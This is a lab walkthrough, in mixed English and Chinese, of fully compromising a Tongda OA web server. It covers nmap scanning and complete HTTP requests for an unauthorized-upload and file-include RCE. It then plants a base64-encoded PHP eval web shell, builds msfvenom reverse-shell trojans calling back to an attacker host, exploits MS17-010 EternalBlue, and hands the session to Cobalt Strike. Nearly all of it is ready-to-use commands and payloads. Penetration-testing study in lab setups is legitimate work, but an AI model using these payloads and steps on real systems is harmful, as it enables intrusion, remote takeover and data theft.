Web Security: Obtain the highest authority of the Web server.
Web server generally refers to a website server, which refers to a program residing on a certain type of computer on the Internet, which can process requests from web clients such as browsers and return corresponding responses, and can also place website files for browsing by the world; it can also place data files , let the world download .
Table of contents:
Web Security: Obtain the highest authority of the Web server.
The network environment shows:
Get the highest authority test of the web server:
The first step: information collection.
Step 2: Vulnerability detection.
Step Three: Vulnerability Exploitation.
Use Tongda OA Unauthorized upload + file contains RCE test.
Transfer session (msf's session is transferred to cs.)
Disclaimer:
It is strictly forbidden to use the virtual machines and technologies mentioned in this article to conduct any form of attack, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.
The network environment shows:
Host information:
| host | Extranet |
Intranet 1 | Intranet 2 |
| kali | 192.168.0.101 | ||
| win 7 | 192.168.0.102 | 10.0.20.98 | |
| win 2016 | 10.0.20.99 | 10.0.10.111 | |
| win 2019 | 10.0.10.110 |
Get the highest authority test of the web server:
The first step: information collection.
使用 nmap 工具对服务器进行端口信息收集.
nmap -A -sV 192.168.0.102
Step 2: Vulnerability detection.
通达 OA 漏洞探测:(可以使用网上进行搜索.)
(1)http[s]:// 服务器 IP 地址/inc/expired.php
(2)http[s]:// 服务器 IP 地址/inc/reg_trial.php
在上面 nmap 工具扫描中发现 445 端口也是开放的.(所以可以试试使用 MS17-010 进行测试.)
Step Three: Vulnerability Exploitation.
Use Tongda OA Unauthorized upload + file contains RCE test.
未授权上传 测试.
构造http请求包,获取图片马地址:POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.0.102
Content-Length: 635
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$fn = fopen("bgxg.php","w+");
$st=base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydiZ3hnJ10pO3BocGluZm8oKTs/Pg==");
$result = fwrite($fn,$st);
fclose($fn);
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
Base64 编码的过程:
https://c.runoob.com/front-end/693/
使用 文件包含 ,把图片中的代码执行,生成出一个新的 php 木马文件.POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.0.102
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
json={"url":"/general/../../attach/im/2306/589610612.jpg"}&cmd=whoami
访问使用了 包含漏洞 有没有生成出,新的木马文件出来.
木马文件的地址在文件包含目录中(/ispirit/interface/木马文件名)(bgxg.php)
使用 蚁剑 进行连接.
生成一个程序(木马),使用 蚁剑 上传.(然后在 MSF 上线.)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.101 lport=4444 -f exe >bgxg.exe
(1)msfconsole //打开 msf 命令
(2)use exploit/multi/handler //加载模块 命令
(3)set payload windows/meterpreter/reverse_tcp //设置 payload 命令
(4)set lhost 192.168.0.101 //设置本地监听 IP(就是 kali 的 IP)命令
(5)set LPORT 4444 //设置本地监听端口(就是 kali 的 端口)命令
(6)run //执行 命令
Tested with MS17-010:
(1)msfconsole //打开 msf 命令
(2)use exploit/windows/smb/ms17_010_eternalblue //加载模块 命令
(3)show options //查看模块信息
(5)set rhosts 192.168.0.102 //设置 服务器 IP 地址.(win7)
(7)run //执行 命令
Transfer session (msf's session is transferred to cs.)
服务端:
(1)cd cs4.7 //切换为 cs 目录
(2)./teamserver 192.168.0.101 888888 //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.
客户端:
(1)cd cs4.7 // 切换为 cs 目录
(2)./start.sh // 打开 客户端.
这里我重新生成一个程序(木马):
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.101 LPORT=8888 -f exe > bgxg.exe(1)msfconsole // 打开 msf 工具.
(2)use exploit/multi/handler // 设置 模块
(3)set payload windows/meterpreter/reverse_tcp //设置 payload
(4)set lhost 192.168.0.101 // 和程序(木马)一样的 IP 地址
(5)set lport 8888 // 和程序(木马)一样的 端口 号.
(6)exploit // 进行 测试.
想方法 把程序(木马) 上传到 服务器(目标)上去.(这里上面有 蚁剑 可以直接上传,也可利用 MS17-010 漏洞上传.)利用 MS17-010 漏洞上传程序(木马)
upload /root/bgxg.exe c:\\bgxg33.exe
upload 攻击机的文件位置 上传到目标机的文件位置和名字
shell //进入目标机器的命令行下面
cd c:\\ //切换到程序(木马)的位置
bgxg33.exe //执行程序(木马)
把 msf 的会话传递到 cs 中.(1)background // 挂起 会话.
(2)use exploit/windows/local/payload_inject
(3)set payload windows/meterpreter/reverse_http
(4)set lhost 192.168.0.101 //设置 CS 服务端的 IP 地址.
(5)set lport 8080 //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])
(6)set DisablePayloadHandler True
(7)set PrependMigrate True
(8)sessions -l //查看 会话 是多少则设置多少
(9)set session 1 [一般是 1(上面查看的结果)]
(10)exploit // 进行 测试.
返回 CS 客户端:看见已经成功. 
Reference article: Linkage between CobaltStrike (CS) and MetasploitFramework (MSF)_Luckysec's Blog-CSDN Blog